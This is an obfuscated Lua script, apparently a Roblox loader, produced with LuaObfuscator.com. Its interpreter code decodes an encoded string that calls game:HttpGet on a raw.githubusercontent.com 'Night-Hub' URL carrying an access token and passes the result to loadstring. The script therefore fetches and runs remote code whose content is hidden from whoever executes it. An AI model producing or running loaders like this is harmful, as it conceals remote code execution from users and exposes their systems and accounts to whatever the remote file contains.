--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v86=(v31/((5 -3)^(v32-1)))%((5 -(880 -(282 + 595)))^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v86-(v86%(620 -(555 + 64))) ;else local v87=931 -(857 + 74) ;local v88;while true do if (v87==(568 -(367 + 201))) then v88=((2566 -(1523 + 114)) -(214 + 713))^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + 0 );v19=v19 + (5 -1) ;return (v37 * (16778281 -(68 + 997))) + (v36 * ((290900 -224094) -(226 + 1044))) + (v35 * 256) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=1905 -(1881 + 24) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v38==3) then v45=nil;v46=nil;v38=4;end if (1==v38) then v41=nil;v42=nil;v38=4 -2 ;end if (v38~=4) then else v47=nil;while true do if (v39==1) then v42=nil;v43=nil;v39=1765 -(454 + 1309) ;end if (v39==4) then while true do if (v40~=0) then else local v122=0 + 0 ;while true do if (v122~=1) then else v40=1 -0 ;break;end if ((0 -0)~=v122) then else v41=0 -0 ;v42=nil;v122=286 -(134 + 151) ;end end end if ((1666 -(970 + 695))~=v40) then else local v123=0 -0 ;while true do if (v123==(1990 -(582 + 1408))) then v43=nil;v44=nil;v123=1;end if ((3 -2)~=v123) then else v40=2;break;end end end if (v40==2) then local v124=0 -0 ;local v125;while true do if (v124==(0 -0)) then v125=1824 -(1195 + 629) ;while true do if (v125~=0) then else v45=nil;v46=nil;v125=1 -0 ;end if ((242 -(187 + 54))~=v125) then else v40=783 -(162 + 618) ;break;end end break;end end end if (v40~=(3 + 0)) then else v47=nil;while true do local v129=0;local v130;while true do if (0==v129) then v130=0;while true do if (v130==0) then local v152=0;while true do if (v152==(0 + 0)) then local v156=0 -0 ;while true do if (0==v156) then if (v41==(4 -1)) then local v169=0;while true do if (v169==0) then for v174=1,v24() do v43[v174-1 ]=v29();end return v45;end end end if (v41~=1) then else local v170=0 + 0 ;local v171;local v172;while true do if (v170~=0) then else v171=1636 -(1373 + 263) ;v172=nil;v170=1001 -(451 + 549) ;end if (v170~=(1 + 0)) then else while true do if (0~=v171) then else v172=0;while true do if (v172==1) then v47={};v41=2;break;end if (v172==(0 -0)) then local v180=0 -0 ;local v181;while true do if (0==v180) then v181=1384 -(746 + 638) ;while true do if (v181==(0 + 0)) then v45={v42,v43,nil,v44};v46=v24();v181=1582 -(1535 + 46) ;end if (v181~=1) then else v172=1 + 0 ;break;end end break;end end end end break;end end break;end end end v156=1 + 0 ;end if (v156==1) then v152=561 -(306 + 254) ;break;end end end if (v152~=(1 + 0)) then else v130=1 -0 ;break;end end end if (v130==(1468 -(899 + 568))) then if (v41==2) then local v153=0;while true do if (v153~=0) then else for v158=1 + 0 ,v46 do local v159=0;local v160;local v161;local v162;local v163;while true do if (v159==(0 -0)) then v160=0;v161=nil;v159=604 -(268 + 335) ;end if ((292 -(60 + 230))~=v159) then else while true do if (v160~=(572 -(426 + 146))) then else v161=0;v162=nil;v160=1 + 0 ;end if (1~=v160) then else v163=nil;while true do if (v161~=(1457 -(282 + 1174))) then else if (v162==1) then v163=v22()~=(811 -(569 + 242)) ;elseif (v162==2) then v163=v25();elseif (v162~=(8 -5)) then else v163=v26();end v47[v158]=v163;break;end if (v161==0) then local v177=0 + 0 ;local v178;local v179;while true do if (v177==0) then v178=0;v179=nil;v177=1025 -(706 + 318) ;end if (v177~=(1252 -(721 + 530))) then else while true do if (v178==(1271 -(945 + 326))) then v179=0 -0 ;while true do if (v179==(1 + 0)) then v161=701 -(271 + 429) ;break;end if (v179==0) then local v192=0 + 0 ;while true do if (v192==(1501 -(1408 + 92))) then v179=1;break;end if (v192~=0) then else v162=v22();v163=nil;v192=1;end end end end break;end end break;end end end end break;end end break;end if (v159==1) then v162=nil;v163=nil;v159=2;end end end v45[3]=v22();v153=1087 -(461 + 625) ;end if (v153~=1) then else for v164=1289 -(993 + 295) ,v24() do local v165=0 + 0 ;local v166;local v167;local v168;while true do if (v165==0) then v166=1171 -(418 + 753) ;v167=nil;v165=1;end if (v165==1) then v168=nil;while true do if (v166~=(0 + 0)) then else v167=0;v168=nil;v166=1;end if (v166~=(1 + 0)) then else while true do if (v167~=0) then else v168=v22();if (v21(v168,1 + 0 ,1)~=(0 + 0)) then else local v182=0;local v183;local v184;local v185;local v186;local v187;while true do if (v182~=(529 -(406 + 123))) then else local v188=0;while true do if (v188==1) then v182=1770 -(1749 + 20) ;break;end if (v188~=0) then else v183=0 + 0 ;v184=nil;v188=1323 -(1249 + 73) ;end end end if (v182~=(1 + 1)) then else v187=nil;while true do if (0~=v183) then else local v189=1145 -(466 + 679) ;local v190;while true do if (0~=v189) then else v190=0 -0 ;while true do if (v190~=0) then else local v202=0;while true do if (v202~=(0 -0)) then else v184=0;v185=nil;v202=1;end if ((1901 -(106 + 1794))==v202) then v190=1 + 0 ;break;end end end if (v190~=(1 + 0)) then else v183=1;break;end end break;end end end if ((2 -1)==v183) then local v191=0 -0 ;while true do if (v191==1) then v183=116 -(4 + 110) ;break;end if (0~=v191) then else v186=nil;v187=nil;v191=585 -(57 + 527) ;end end end if (2==v183) then while true do if (v184~=0) then else local v193=1427 -(41 + 1386) ;local v194;while true do if (v193~=(103 -(17 + 86))) then else v194=0 + 0 ;while true do if ((0 -0)==v194) then local v204=0 -0 ;while true do if (v204~=1) then else v194=167 -(122 + 44) ;break;end if (v204~=0) then else v185=v21(v168,2 -0 ,9 -6 );v186=v21(v168,4 + 0 ,6);v204=1 + 0 ;end end end if (v194~=(1 -0)) then else v184=1;break;end end break;end end end if (v184==(68 -(30 + 35))) then if (v21(v186,3 + 0 ,3)~=(1258 -(1043 + 214))) then else v187[4]=v47[v187[15 -11 ]];end v42[v164]=v187;break;end if (2~=v184) then else local v196=0;local v197;local v198;while true do if (v196==(1213 -(323 + 889))) then while true do if (v197~=0) then else v198=0;while true do if (v198==1) then v184=7 -4 ;break;end if (v198~=0) then else local v207=580 -(361 + 219) ;while true do if ((320 -(53 + 267))~=v207) then else local v209=0;while true do if (v209~=(0 + 0)) then else if (v21(v186,1,414 -(15 + 398) )~=(983 -(18 + 964))) then else v187[2]=v47[v187[2]];end if (v21(v186,7 -5 ,2)==(1 + 0)) then v187[2 + 1 ]=v47[v187[3]];end v209=1;end if (v209~=1) then else v207=851 -(20 + 830) ;break;end end end if (v207==1) then v198=1 + 0 ;break;end end end end break;end end break;end if (v196~=(126 -(116 + 10))) then else v197=0;v198=nil;v196=1 + 0 ;end end end if (v184==(739 -(542 + 196))) then local v199=0;while true do if (v199~=1) then else v184=3 -1 ;break;end if (v199~=(0 + 0)) then else local v203=0;while true do if (v203==(1 + 0)) then v199=1;break;end if (v203~=(0 + 0)) then else v187={v23(),v23(),nil,nil};if (v185==(1551 -(1126 + 425))) then local v205=405 -(118 + 287) ;local v206;while true do if (v205~=(0 -0)) then else v206=1121 -(118 + 1003) ;while true do if (v206~=0) then else v187[3]=v23();v187[4]=v23();break;end end break;end end elseif (v185==(2 -1)) then v187[380 -(142 + 235) ]=v24();elseif (v185==(9 -7)) then v187[3]=v24() -((1 + 1)^16) ;elseif (v185==(980 -(553 + 424))) then local v213=0 -0 ;local v214;while true do if (0==v213) then v214=0 + 0 ;while true do if (v214==0) then v187[3]=v24() -(2^(16 + 0)) ;v187[3 + 1 ]=v23();break;end end break;end end end v203=1 + 0 ;end end end end end end break;end end break;end if (v182==(1 + 0)) then v185=nil;v186=nil;v182=4 -2 ;end end end break;end end break;end end break;end end end v41=3;break;end end end if (v41~=(0 -0)) then else local v154=0 -0 ;local v155;while true do if (v154~=(0 + 0)) then else v155=0 -0 ;while true do if (v155==(753 -(239 + 514))) then local v173=0;while true do if (v173==(0 + 0)) then v42={};v43={};v173=1;end if (v173==1) then v155=1330 -(797 + 532) ;break;end end end if (v155==1) then v44={};v41=1 + 0 ;break;end end break;end end end break;end end break;end end end break;end end break;end if (v39==(2 + 1)) then local v99=0;while true do if (v99==(2 -1)) then v39=1206 -(373 + 829) ;break;end if (v99==0) then v46=nil;v47=nil;v99=732 -(476 + 255) ;end end end if (v39~=(1130 -(369 + 761))) then else local v100=0 + 0 ;while true do if ((0 -0)~=v100) then else v40=0 -0 ;v41=nil;v100=239 -(64 + 174) ;end if (1==v100) then v39=1;break;end end end if (v39==2) then v44=nil;v45=nil;v39=1 + 2 ;end end break;end if (v38~=(2 -0)) then else v43=nil;v44=nil;v38=3;end if (v38~=0) then else v39=336 -(144 + 192) ;v40=nil;v38=1;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=216 -(42 + 174) ;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(1 + 0)) then v51=1;v52=(v21(v50,1 + 0 ,9 + 11 ) * ((1506 -(363 + 376 + 765))^(1612 -(1183 + 397)))) + v49 ;v48=5 -3 ;end if (v48==(2 + 0)) then v53=v21(v50,16 + 5 ,2006 -(1913 + 62) );v54=((v21(v50,21 + (1624 -(1565 + 48)) )==(2 -1)) and  -((1195 + 739) -(565 + 1368))) or (3 -2) ;v48=1664 -(1477 + 184) ;end if (((1138 -(782 + 356)) -0)==v48) then v49=v24();v50=v24();v48=1 + 0 ;end if (v48==(859 -(564 + 292))) then if (v53==((267 -(176 + 91)) -(0 -0))) then if (v52==0) then return v54 * (0 -(0 -0)) ;else v53=1;v51=304 -(244 + 60) ;end elseif (v53==(1574 + 473)) then return ((v52==(476 -((1133 -(975 + 117)) + (2310 -(157 + 1718))))) and (v54 * (1/(1001 -(938 + 63))))) or (v54 * NaN) ;end return v8(v54,v53-(787 + 192 + 44) ) * (v51 + (v52/(2^(1177 -(936 + 189))))) ;end end end v26=nil;function v26(v55)local v56;if  not v55 then local v89=0 -0 ;while true do if (v89==0) then v55=v24();if (v55==0) then return "";end break;end end end v56=v3(v16,v19,(v19 + v55) -(3 -2) );v19=v19 + v55 ;local v57={};for v70=(2775 -1756) -(697 + 321) , #v56 do v57[v70]=v2(v1(v3(v56,v70,v70)));end return v6(v57);end v18=5;end if (v18==2) then function v22()local v58=0;local v59;while true do if (v58==(1 -(0 -0))) then return v59;end if (v58==(0 -0)) then v59=v1(v16,v19,v19);v19=v19 + 1 + (1227 -(322 + 905)) ;v58=1 -0 ;end end end v23=nil;function v23()local v60=(197 + 414) -((2500 -(260 + 1638)) + 9) ;local v61;local v62;while true do if (v60==(1189 -((889 -(382 + 58)) + 740))) then v61,v62=v1(v16,v19,v19 + (874 -(826 + 46)) );v19=v19 + (6 -4) ;v60=948 -(245 + 702) ;end if (v60==(3 -2)) then return (v62 * 256) + v61 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v63)if (v1(v63,2)==79) then v20=v0(v3(v63,1,1));return "";else local v90=v2(v0(v63,16));if v20 then local v94=v5(v90,v20);v20=nil;return v94;else return v90;end end end);v18=1;end if (v18==7) then function v30(v64,v65,v66)local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...)local v72=v67;local v73=v68;local v74=v69;local v75=v28;local v76=1;local v77= -1;local v78={};local v79={...};local v80=v12("#",...) -1 ;local v81={};local v82={};for v91=0,v80 do if (v91>=v74) then v78[v91-v74 ]=v79[v91 + 1 ];else v82[v91]=v79[v91 + 1 ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do v84=v72[v76];v85=v84[1];if (v85<=3) then if (v85<=1) then if (v85>0) then v82[v84[2]]=v66[v84[3]];else local v103=v84[2];local v104=v82[v84[3]];v82[v103 + 1 ]=v104;v82[v103]=v104[v84[4]];end elseif (v85>2) then local v108=v84[2];local v109,v110=v75(v82[v108](v13(v82,v108 + 1 ,v84[3])));v77=(v110 + v108) -1 ;local v111=0;for v126=v108,v77 do v111=v111 + 1 ;v82[v126]=v109[v111];end else local v112=v84[2];v82[v112]=v82[v112](v13(v82,v112 + 1 ,v77));end elseif (v85<=5) then if (v85==4) then v82[v84[2]]=v84[3];else do return;end end elseif (v85==6) then v82[v84[2]]();else local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (v116==3) then v84=v72[v76];v82[v84[2]]=v84[3];v76=v76 + 1 ;v84=v72[v76];v121=v84[2];v116=4;end if (v116==0) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v82[v84[2]]=v66[v84[3]];v116=1;end if (6==v116) then v82[v84[2]]();v76=v76 + 1 ;v84=v72[v76];do return;end break;end if (v116==1) then v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v66[v84[3]];v76=v76 + 1 ;v84=v72[v76];v116=2;end if (v116==2) then v121=v84[2];v120=v82[v84[3]];v82[v121 + 1 ]=v120;v82[v121]=v120[v84[4]];v76=v76 + 1 ;v116=3;end if (5==v116) then v84=v72[v76];v121=v84[2];v82[v121]=v82[v121](v13(v82,v121 + 1 ,v77));v76=v76 + 1 ;v84=v72[v76];v116=6;end if (4==v116) then v118,v119=v75(v82[v121](v13(v82,v121 + 1 ,v84[3])));v77=(v119 + v121) -1 ;v117=0;for v149=v121,v77 do v117=v117 + 1 ;v82[v149]=v118[v117];end v76=v76 + 1 ;v116=5;end end end v76=v76 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403783O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4E67686961766E64657074726169762O632F4E696768742D4875622F6D61696E2F4D61696E3F746F6B656E3D4748534154306O41434833554643544459493741494F5537414F2O4B46344F5A494C5342324100083O0012073O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
